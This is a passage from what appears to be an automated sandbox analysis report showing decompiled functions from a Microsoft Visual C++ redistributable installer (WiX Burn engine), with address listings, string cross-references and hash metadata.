							_t208 =  *((intOrPtr*)(_t223 +  *((intOrPtr*)(_t212 + 0x7c))));
							 *((intOrPtr*)(_t208 + 0x10)) =  *((intOrPtr*)(_t198 + 0x10));
							 *((intOrPtr*)(_t208 + 0x14)) =  *((intOrPtr*)(_t198 + 0x14));
							_t220 = E000121A5( *((intOrPtr*)(_t223 +  *((intOrPtr*)(_t212 + 0x7c)))),  *((intOrPtr*)( *_a24)), 0);
							if(_t220 < 0) {
								_push("Failed to copy key for passthrough pseudo bundle payload.");
								goto L23;
							} else {
								_t220 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _a4 * 8)) + 0x18,  *((intOrPtr*)( *_a24 + 0x18)), 0);
								if(_t220 < 0) {
									_push("Failed to copy filename for passthrough pseudo bundle.");
									goto L23;
								} else {
									_t220 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _a4 * 8)) + 0x38,  *((intOrPtr*)( *_a24 + 0x38)), 0);
									if(_t220 < 0) {
										_push("Failed to copy local source path for passthrough pseudo bundle.");
										goto L23;
									} else {
										_t224 = _a24;
										_t173 =  *_t224;
										if( *((intOrPtr*)( *_t224 + 0x40)) == 0) {
											L12:
											_t174 =  *_t224;
											if( *((intOrPtr*)( *_t224 + 0x30)) == 0) {
												L15:
												_t209 = _a4;
												_t193 =  *((intOrPtr*)(_t212 + 0x7c));
												 *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + 4 + _t209 * 8)) =  *((intOrPtr*)(_t224 + 4));
												_t206 = _t209 + 1;
												_a4 = _t206;
												if(_t206 <  *(_t190 + 0x80)) {
													continue;
												} else {
													goto L16;
												}
											} else {
												_t176 = E000138D4( *((intOrPtr*)(_t174 + 0x34)), 0);
												_t210 = _a4;
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _t210 * 8)) + 0x30)) = _t176;
												_t177 =  *((intOrPtr*)(_t212 + 0x7c));
												_t203 =  *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _t210 * 8));
												if( *((intOrPtr*)(_t203 + 0x30)) == 0) {
													_t214 = 0x8007000e;
													_t220 = 0x8007000e;
													E000137D3(_t177, "pseudobundle.cpp", 0xc9, 0x8007000e);
													_push("Failed to allocate memory for pseudo bundle payload hash.");
													goto L2;
												} else {
													 *((intOrPtr*)(_t203 + 0x34)) =  *((intOrPtr*)( *_t224 + 0x34));
													E00031664( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _t210 * 8)) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _t210 * 8)) + 0x34)),  *((intOrPtr*)( *_t224 + 0x30)),  *((intOrPtr*)( *_t224 + 0x34)));
													_t225 = _t225 + 0x10;
													goto L15;
												}
											}
										} else {
											_t220 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _a4 * 8)) + 0x40,  *((intOrPtr*)(_t173 + 0x40)), 0);
											if(_t220 < 0) {
												_push("Failed to copy download source for passthrough pseudo bundle.");
												L23:
												_push(_t220);
												goto L3;
											} else {
												_t224 = _a24;
												goto L12;
											}
										}
									}
								}
							}
							goto L36;
						}
						_t214 = 0x8007000e;
						_t220 = 0x8007000e;
						E000137D3(_t150, "pseudobundle.cpp", 0xb3, 0x8007000e);
						_push("Failed to allocate space for burn payload inside of related bundle struct");
						goto L2;
					}
				} else {
					_t214 = 0x8007000e;
					_t220 = 0x8007000e;
					E000137D3(_t121, "pseudobundle.cpp", 0xab, 0x8007000e);
					_push("Failed to allocate space for burn package payload inside of passthrough bundle.");
					L2:
					_push(_t214);
					L3:
					E0005012F();
				}
				L36:
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t220;
			}





















                                                                          0x0003c517
                                                                          0x0003c51a
                                                                          0x0003c51b
                                                                          0x0003c520
                                                                          0x0003c531
                                                                          0x0003c536
                                                                          0x0003c539
                                                                          0x0003c53e
                                                                          0x0003c56f
                                                                          0x0003c571
                                                                          0x0003c577
                                                                          0x0003c580
                                                                          0x0003c6d7
                                                                          0x0003c6d7
                                                                          0x0003c6db
                                                                          0x0003c6eb
                                                                          0x0003c6f4
                                                                          0x0003c6fa
                                                                          0x0003c700
                                                                          0x0003c706
                                                                          0x0003c70c
                                                                          0x0003c712
                                                                          0x0003c71a
                                                                          0x0003c729
                                                                          0x0003c799
                                                                          0x0003c7a6
                                                                          0x0003c7b5
                                                                          0x0003c7e4
                                                                          0x0003c7ef
                                                                          0x0003c803
                                                                          0x0003c813
                                                                          0x0003c81f
                                                                          0x0003c823
                                                                          0x0003c833
                                                                          0x0003c839
                                                                          0x0003c849
                                                                          0x0003c84d
                                                                          0x0003c859
                                                                          0x0003c84f
                                                                          0x0003c84f
                                                                          0x00000000
                                                                          0x0003c84f
                                                                          0x0003c825
                                                                          0x0003c825
                                                                          0x00000000
                                                                          0x0003c825
                                                                          0x0003c805
                                                                          0x0003c805
                                                                          0x00000000
                                                                          0x0003c805
                                                                          0x0003c7e6
                                                                          0x0003c7e6
                                                                          0x00000000
                                                                          0x0003c7e6
                                                                          0x0003c7a8
                                                                          0x0003c7a8
                                                                          0x00000000
                                                                          0x0003c7a8
                                                                          0x0003c72b
                                                                          0x0003c72b
                                                                          0x00000000
                                                                          0x0003c72b
                                                                          0x0003c586
                                                                          0x0003c586
                                                                          0x0003c58b
                                                                          0x0003c594
                                                                          0x0003c59f
                                                                          0x0003c5a2
                                                                          0x0003c5a5
                                                                          0x0003c5aa
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003c5b0
                                                                          0x0003c5ba
                                                                          0x0003c5c0
                                                                          0x0003c5c2
                                                                          0x0003c5c8
                                                                          0x0003c5ce
                                                                          0x0003c5e3
                                                                          0x0003c5e7
                                                                          0x0003c768
                                                                          0x00000000
                                                                          0x0003c5ed
                                                                          0x0003c609
                                                                          0x0003c60d
                                                                          0x0003c761
                                                                          0x00000000
                                                                          0x0003c613
                                                                          0x0003c62f
                                                                          0x0003c633
                                                                          0x0003c75a
                                                                          0x00000000
                                                                          0x0003c639
                                                                          0x0003c639
                                                                          0x0003c63c
                                                                          0x0003c642
                                                                          0x0003c668
                                                                          0x0003c668
                                                                          0x0003c66e
                                                                          0x0003c6ba
                                                                          0x0003c6ba
                                                                          0x0003c6bd
                                                                          0x0003c6c3
                                                                          0x0003c6c7
                                                                          0x0003c6c8
                                                                          0x0003c6d1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003c670
                                                                          0x0003c675
                                                                          0x0003c67d
                                                                          0x0003c683
                                                                          0x0003c686
                                                                          0x0003c689
                                                                          0x0003c690
                                                                          0x0003c739
                                                                          0x0003c749
                                                                          0x0003c74b
                                                                          0x0003c750
                                                                          0x00000000
                                                                          0x0003c696
                                                                          0x0003c69b
                                                                          0x0003c6b2
                                                                          0x0003c6b7
                                                                          0x00000000
                                                                          0x0003c6b7
                                                                          0x0003c690
                                                                          0x0003c644
                                                                          0x0003c65b
                                                                          0x0003c65f
                                                                          0x0003c732
                                                                          0x0003c76d
                                                                          0x0003c76d
                                                                          0x00000000
                                                                          0x0003c665
                                                                          0x0003c665
                                                                          0x00000000
                                                                          0x0003c665
                                                                          0x0003c65f
                                                                          0x0003c642
                                                                          0x0003c633
                                                                          0x0003c60d
                                                                          0x00000000
                                                                          0x0003c5e7
                                                                          0x0003c773
                                                                          0x0003c783
                                                                          0x0003c785
                                                                          0x0003c78a
                                                                          0x00000000
                                                                          0x0003c78a
                                                                          0x0003c540
                                                                          0x0003c540
                                                                          0x0003c550
                                                                          0x0003c552
                                                                          0x0003c557
                                                                          0x0003c55c
                                                                          0x0003c55c
                                                                          0x0003c55d
                                                                          0x0003c55d
                                                                          0x0003c563
                                                                          0x0003c860
                                                                          0x0003c864
                                                                          0x0003c869
                                                                          0x0003c869
                                                                          0x0003c876

                                                                          Strings
                                                                          • Failed to copy key for passthrough pseudo bundle., xrefs: 0003C72B
                                                                          • Failed to copy install arguments for passthrough bundle package, xrefs: 0003C805
                                                                          • Failed to copy local source path for passthrough pseudo bundle., xrefs: 0003C75A
                                                                          • Failed to recreate command-line arguments., xrefs: 0003C7E6
                                                                          • Failed to copy related arguments for passthrough bundle package, xrefs: 0003C825
                                                                          • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 0003C84F
                                                                          • Failed to copy download source for passthrough pseudo bundle., xrefs: 0003C732
                                                                          • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0003C750
                                                                          • pseudobundle.cpp, xrefs: 0003C54B, 0003C744, 0003C77E
                                                                          • Failed to copy cache id for passthrough pseudo bundle., xrefs: 0003C7A8
                                                                          • Failed to copy filename for passthrough pseudo bundle., xrefs: 0003C761
                                                                          • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 0003C557
                                                                          • Failed to copy key for passthrough pseudo bundle payload., xrefs: 0003C768
                                                                          • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0003C78A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateProcess
                                                                          • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                                          • API String ID: 1357844191-115096447
                                                                          • Opcode ID: ca6dbdb78e9afbe432f3a3ba20842c4541727dfc79510381d6e713671e8699d8
                                                                          • Instruction ID: b12e4d7f2a02f7cf81bb50043c082b28a226e4ea3f74aae3fd00e2a1dc3c826d
                                                                          • Opcode Fuzzy Hash: ca6dbdb78e9afbe432f3a3ba20842c4541727dfc79510381d6e713671e8699d8
                                                                          • Instruction Fuzzy Hash: 01B13975A04616EFEB12DF68C881F99BBA5BF08710F114169FE14EB362C731E861DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001B106 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 136COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 23%
                                                                          			E0001B106(intOrPtr _a4) {
				void* _t35;
				signed short _t40;
				intOrPtr* _t45;
				void* _t47;
				intOrPtr _t49;
				signed int _t50;
				signed int _t53;
				intOrPtr _t56;
				signed int _t57;
				intOrPtr* _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;

				_t57 = 0;
				_t61 = GetModuleHandleW(0);
				if(_t61 != 0) {
					if(0x5a4d ==  *_t61) {
						_t49 =  *((intOrPtr*)(_t61 + 0x3c));
						if( *((intOrPtr*)(_t49 + _t61)) == 0x4550) {
							_t5 = _t61 + 0x18; // 0x18
							_t45 = _t5 + ( *(_t49 + _t61 + 0x14) & 0x0000ffff) + _t49;
							if(E0003F919(_t45, ".wixburn", 8) == 0) {
								L13:
								if( *((intOrPtr*)(_t45 + 0x10)) >= 0x34) {
									_t47 =  *((intOrPtr*)(_t45 + 0xc)) + _t61;
									if( *((intOrPtr*)(_t47 + 4)) == 2) {
										_t56 = _a4;
										_t50 = _t57;
										while(1) {
											_t26 =  *((intOrPtr*)(_t56 + _t50 * 4));
											if( *((intOrPtr*)(_t56 + _t50 * 4)) !=  *((intOrPtr*)(_t47 + 8 + _t50 * 4))) {
												break;
											}
											_t50 = _t50 + 1;
											if(_t50 != 4) {
												continue;
											} else {
											}
											goto L25;
										}
										_t62 = 0x8007000d;
										_t57 = 0x8007000d;
										E000137D3(_t26, "section.cpp", 0x18a, 0x8007000d);
										_push("Bundle guid didn\'t match the guid in the PE Header in memory.");
										goto L24;
									} else {
										_t63 = 0x8007000d;
										_t57 = 0x8007000d;
										E000137D3(_t25, "section.cpp", 0x184, 0x8007000d);
										_push( *((intOrPtr*)(_t47 + 4)));
										_push("Failed to read section info, unsupported version: %08x");
										goto L18;
									}
								} else {
									_t63 = 0x8007000d;
									_t57 = 0x8007000d;
									E000137D3(_t25, "section.cpp", 0x17a, 0x8007000d);
									_push( *((intOrPtr*)(_t45 + 0x10)));
									_push("Failed to read section info, data to short: %u");
									L18:
									_push(_t63);
									E0005012F();
								}
							} else {
								_t53 =  *( *((intOrPtr*)(_t61 + 0x3c)) + _t61 + 6) & 0x0000ffff;
								_t35 = 1;
								while(_t35 < _t53) {
									_t45 = _t45 + 0x28;
									_t35 = _t35 + 1;
									if( *_t45 != 0x7869772e ||  *((intOrPtr*)(_t45 + 4)) != 0x6e727562) {
										continue;
									} else {
										goto L13;
									}
									goto L25;
								}
								_t62 = 0x8007000d;
								_t57 = 0x8007000d;
								E000137D3(_t35, "section.cpp", 0x16e, 0x8007000d);
								_push("Failed to find Burn section.");
								L24:
								_push(_t62);
								E0005012F();
							}
							L25:
						} else {
							_t64 = 0x8007000d;
							_t57 = 0x8007000d;
							E000137D3(0x5a4d, "section.cpp", 0x155, 0x8007000d);
							_push("Failed to find valid NT image header in buffer.");
							goto L5;
						}
					} else {
						_t64 = 0x8007000d;
						_t57 = 0x8007000d;
						E000137D3(0x5a4d, "section.cpp", 0x14a, 0x8007000d);
						_push("Failed to find valid DOS image header in buffer.");
						L5:
						_push(_t64);
						goto L2;
					}
				} else {
					_t40 = GetLastError();
					_t60 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
					_t57 =  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "section.cpp", 0x140, _t57);
					_push("Failed to get module handle to process.");
					_push(_t57);
					L2:
					E0005012F();
				}
				return _t57;
			}
















                                                                          0x0001b10b
                                                                          0x0001b114
                                                                          0x0001b118
                                                                          0x0001b162
                                                                          0x0001b183
                                                                          0x0001b18d
                                                                          0x0001b1b5
                                                                          0x0001b1ba
                                                                          0x0001b1cc
                                                                          0x0001b1f2
                                                                          0x0001b1f6
                                                                          0x0001b23a
                                                                          0x0001b240
                                                                          0x0001b26c
                                                                          0x0001b26f
                                                                          0x0001b271
                                                                          0x0001b271
                                                                          0x0001b278
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001b27a
                                                                          0x0001b27e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001b280
                                                                          0x00000000
                                                                          0x0001b27e
                                                                          0x0001b282
                                                                          0x0001b292
                                                                          0x0001b294
                                                                          0x0001b299
                                                                          0x00000000
                                                                          0x0001b242
                                                                          0x0001b242
                                                                          0x0001b252
                                                                          0x0001b254
                                                                          0x0001b259
                                                                          0x0001b25c
                                                                          0x00000000
                                                                          0x0001b25c
                                                                          0x0001b1f8
                                                                          0x0001b1f8
                                                                          0x0001b208
                                                                          0x0001b20a
                                                                          0x0001b20f
                                                                          0x0001b212
                                                                          0x0001b261
                                                                          0x0001b261
                                                                          0x0001b262
                                                                          0x0001b267
                                                                          0x0001b1ce
                                                                          0x0001b1d1
                                                                          0x0001b1d8
                                                                          0x0001b1d9
                                                                          0x0001b1dd
                                                                          0x0001b1e0
                                                                          0x0001b1e7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001b1e7
                                                                          0x0001b219
                                                                          0x0001b229
                                                                          0x0001b22b
                                                                          0x0001b230
                                                                          0x0001b29e
                                                                          0x0001b29e
                                                                          0x0001b29f
                                                                          0x0001b2a5
                                                                          0x0001b2a6
                                                                          0x0001b18f
                                                                          0x0001b18f
                                                                          0x0001b19f
                                                                          0x0001b1a1
                                                                          0x0001b1a6
                                                                          0x00000000
                                                                          0x0001b1a6
                                                                          0x0001b164
                                                                          0x0001b164
                                                                          0x0001b174
                                                                          0x0001b176
                                                                          0x0001b17b
                                                                          0x0001b180
                                                                          0x0001b180
                                                                          0x00000000
                                                                          0x0001b180
                                                                          0x0001b11a
                                                                          0x0001b11a
                                                                          0x0001b12b
                                                                          0x0001b135
                                                                          0x0001b143
                                                                          0x0001b148
                                                                          0x0001b14d
                                                                          0x0001b14e
                                                                          0x0001b14e
                                                                          0x0001b154
                                                                          0x0001b2ac

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0001B9F7,00000008,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B10E
                                                                          • GetLastError.KERNEL32(?,0001B9F7,00000008,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B11A
                                                                          • _memcmp.LIBVCRUNTIME ref: 0001B1C2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandleLastModule_memcmp
                                                                          • String ID: .wix$.wixburn$@Met$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
                                                                          • API String ID: 3888311042-2963902760
                                                                          • Opcode ID: ef584cfb80040fc13d865f3369223c37d94abd314fade434384cd182f8d8a108
                                                                          • Instruction ID: 7e27c0426dc39465b0f6ea893244fda3db0243f176917395bc946926e992ad20
                                                                          • Opcode Fuzzy Hash: ef584cfb80040fc13d865f3369223c37d94abd314fade434384cd182f8d8a108
                                                                          • Instruction Fuzzy Hash: 97412B72384711B7D7355951DC42FFB32A6AF40B22F254029FE065F5C2D778CA8983A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000167E5 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 131libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 55%
                                                                          			E000167E5(signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v16;
				signed short _v284;
				signed short _v288;
				char _v292;
				int _v296;
				signed int _v300;
				intOrPtr _v308;
				signed int _v320;
				signed int _v324;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				struct HINSTANCE__** _t36;
				_Unknown_base(*)()* _t37;
				void* _t40;
				void* _t50;
				signed short _t55;
				signed short _t57;
				signed short _t60;
				intOrPtr _t63;
				signed int _t64;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t78;
				signed int _t85;

				_t73 = __edx;
				_t30 =  *0x7a008; // 0xfbf51acb
				_v8 = _t30 ^ _t85;
				_t63 = _a8;
				_v296 = 0;
				E0003F670(_t74,  &_v292, 0, 0x11c);
				_t75 =  &_v324;
				_t64 = 6;
				memset(_t75, 0, _t64 << 2);
				_t76 = _t75 + _t64;
				_t36 =  &_v296;
				__imp__GetModuleHandleExW(0, L"ntdll", _t36);
				if(_t36 != 0) {
					_t37 = GetProcAddress(_v296, "RtlGetVersion");
					if(_t37 != 0) {
						_v292 = 0x11c;
						_t78 =  *_t37( &_v292);
						if(_t78 >= 0) {
							_t40 = _a4 - 1;
							if(_t40 == 0) {
								L12:
								_v308 = 3;
								_v324 = _v324 & 0x00000000;
								asm("cdq");
								_v320 = (_v288 & 0x0000ffff) << 0x00000010 | _v284 & 0x0000ffff;
								L13:
								_t78 = E0002FF73(_t73,  &_v324, _t63);
								if(_t78 >= 0) {
									goto L16;
								}
								_push("Failed to set variant value.");
								goto L15;
							}
							_t50 = _t40 - 1;
							if(_t50 == 0) {
								_v300 = _v300 & 0x00000000;
								E000509BB( &_v292, GetCurrentProcess(),  &_v300);
								if(_v300 == 0) {
									goto L13;
								}
								goto L12;
							}
							if(_t50 == 1) {
								_t55 = _v16;
								if(0 != _t55) {
									asm("cdq");
									_v324 = _t55 & 0x0000ffff;
									_v320 = _t73;
									_v308 = 1;
								}
							}
							goto L13;
						}
						_push("Failed to get OS info.");
						goto L15;
					}
					_t57 = GetLastError();
					_t81 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
					_t78 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "variable.cpp", 0x662, _t78);
					_push("Failed to locate RtlGetVersion.");
					goto L15;
				} else {
					_t60 = GetLastError();
					_t84 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					_t78 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "variable.cpp", 0x65c, _t78);
					_push("Failed to locate NTDLL.");
					L15:
					_push(_t78);
					E0005012F();
					L16:
					if(_v296 != 0) {
						FreeLibrary(_v296);
					}
					return E0003DE36(_t63, _v8 ^ _t85, _t73, _t76, _t78);
				}
			}

































                                                                          0x000167e5
                                                                          0x000167ee
                                                                          0x000167f5
                                                                          0x000167f9
                                                                          0x0001680d
                                                                          0x00016813
                                                                          0x0001681b
                                                                          0x00016825
                                                                          0x00016826
                                                                          0x00016826
                                                                          0x00016828
                                                                          0x00016835
                                                                          0x0001683d
                                                                          0x00016882
                                                                          0x0001688a
                                                                          0x000168ca
                                                                          0x000168d7
                                                                          0x000168db
                                                                          0x000168ea
                                                                          0x000168ed
                                                                          0x00016943
                                                                          0x00016956
                                                                          0x00016960
                                                                          0x00016967
                                                                          0x00016968
                                                                          0x0001696e
                                                                          0x0001697b
                                                                          0x0001697f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016981
                                                                          0x00000000
                                                                          0x00016981
                                                                          0x000168ef
                                                                          0x000168f2
                                                                          0x00016920
                                                                          0x00016935
                                                                          0x00016941
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016941
                                                                          0x000168f7
                                                                          0x000168f9
                                                                          0x00016902
                                                                          0x00016907
                                                                          0x00016908
                                                                          0x0001690e
                                                                          0x00016914
                                                                          0x00016914
                                                                          0x00016902
                                                                          0x00000000
                                                                          0x000168f7
                                                                          0x000168dd
                                                                          0x00000000
                                                                          0x000168dd
                                                                          0x0001688c
                                                                          0x0001689d
                                                                          0x000168a7
                                                                          0x000168b5
                                                                          0x000168ba
                                                                          0x00000000
                                                                          0x0001683f
                                                                          0x0001683f
                                                                          0x00016850
                                                                          0x0001685a
                                                                          0x00016868
                                                                          0x0001686d
                                                                          0x00016986
                                                                          0x00016986
                                                                          0x00016987
                                                                          0x0001698e
                                                                          0x00016995
                                                                          0x0001699d
                                                                          0x0001699d
                                                                          0x000169b5
                                                                          0x000169b5

                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 00016835
                                                                          • GetLastError.KERNEL32 ref: 0001683F
                                                                          • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 00016882
                                                                          • GetLastError.KERNEL32 ref: 0001688C
                                                                          • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 0001699D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                                          • String ID: @Met$Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                                          • API String ID: 3057421322-2963171980
                                                                          • Opcode ID: 983b75bf8ad2dcbc4a6bbb352ac74a74f12725e0f037e4403de8ce3f9a4cdb5b
                                                                          • Instruction ID: 06a29c5c0621dba637f7eb86ee63f3305b6cbc9cd1c076ef9939ae46af0c5482
                                                                          • Opcode Fuzzy Hash: 983b75bf8ad2dcbc4a6bbb352ac74a74f12725e0f037e4403de8ce3f9a4cdb5b
                                                                          • Instruction Fuzzy Hash: F641B371D003389BEB319B65CC05BEFBAE8EB08751F00019AED48F6191E7758E94CA95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000147E9 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 128memorysynchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E000147E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12) {
				void* _v8;
				char _v12;
				void* __ebx;
				long _t28;
				signed short _t29;
				signed short _t53;
				signed short _t56;
				void* _t65;
				intOrPtr _t67;
				signed short _t71;
				signed short _t75;
				signed short _t78;

				_t65 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t67 = _a12;
				_v8 = 0;
				_v12 = 0;
				if(E00024933(0, __ecx, _t67 + 0x4a0, 1) >= 0) {
					_t28 = TlsAlloc();
					 *(_t67 + 0x498) = _t28;
					__eflags = _t28 - 0xffffffff;
					if(_t28 != 0xffffffff) {
						_t29 = TlsSetValue(_t28,  *(_t67 + 0x4b0));
						__eflags = _t29;
						if(_t29 != 0) {
							E0005058B(E0001444C, _t67);
							_t71 = E0002E82A(_a4, _t67);
							__eflags = _t71;
							if(_t71 >= 0) {
								E00051B28(_t65, 1);
								_t71 = E0002D01A( *(_t67 + 0x498),  *(_t67 + 0x4b0),  *((intOrPtr*)(_t67 + 0x4b4)), _t67 + 0x3d8, _t67 + 0x2a8, _t67 + 0x2c0, _t67 + 0x2b8, _t67 + 0x88, _t67 + 0x100, _t67 + 0xb8,  &_v8,  &_v12, _t67 + 0xf8, _t67 + 0x18);
								E0005058B(0, 0);
								__eflags = _t71;
								if(_t71 < 0) {
									_push("Failed to pump messages from parent process.");
									goto L10;
								}
							} else {
								_push("Failed to create the message window.");
								goto L10;
							}
						} else {
							_t53 = GetLastError();
							__eflags = _t53;
							_t75 =  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
							__eflags = _t75;
							_t71 =  >=  ? 0x80004005 : _t75;
							E000137D3(0x80004005, "engine.cpp", 0x251, _t71);
							_push("Failed to set elevated pipe into thread local storage for logging.");
							goto L10;
						}
					} else {
						_t56 = GetLastError();
						__eflags = _t56;
						_t78 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
						__eflags = _t78;
						_t71 =  >=  ? 0x80004005 : _t78;
						E000137D3(0x80004005, "engine.cpp", 0x24c, _t71);
						_push("Failed to allocate thread local storage for logging.");
						goto L10;
					}
				} else {
					_push("Failed to connect to unelevated process.");
					L10:
					_push(_t71);
					E0005012F();
				}
				E0005058B(0, 0);
				E0002E7EB(_t67);
				_t80 = _v12;
				if(_v12 != 0) {
					E0002D156(_t80);
				}
				if(_v8 != 0) {
					ReleaseMutex(_v8);
					CloseHandle(_v8);
				}
				return _t71;
			}















                                                                          0x000147e9
                                                                          0x000147ec
                                                                          0x000147ed
                                                                          0x000147f1
                                                                          0x000147f8
                                                                          0x000147fb
                                                                          0x0001480e
                                                                          0x0001481a
                                                                          0x00014820
                                                                          0x00014826
                                                                          0x00014829
                                                                          0x0001486a
                                                                          0x00014870
                                                                          0x00014872
                                                                          0x000148b2
                                                                          0x000148c0
                                                                          0x000148c2
                                                                          0x000148c4
                                                                          0x000148cf
                                                                          0x00014931
                                                                          0x00014933
                                                                          0x00014938
                                                                          0x0001493a
                                                                          0x0001493c
                                                                          0x00000000
                                                                          0x0001493c
                                                                          0x000148c6
                                                                          0x000148c6
                                                                          0x00000000
                                                                          0x000148c6
                                                                          0x00014874
                                                                          0x00014874
                                                                          0x00014883
                                                                          0x00014885
                                                                          0x0001488d
                                                                          0x0001488f
                                                                          0x0001489d
                                                                          0x000148a2
                                                                          0x00000000
                                                                          0x000148a2
                                                                          0x0001482b
                                                                          0x0001482b
                                                                          0x0001483a
                                                                          0x0001483c
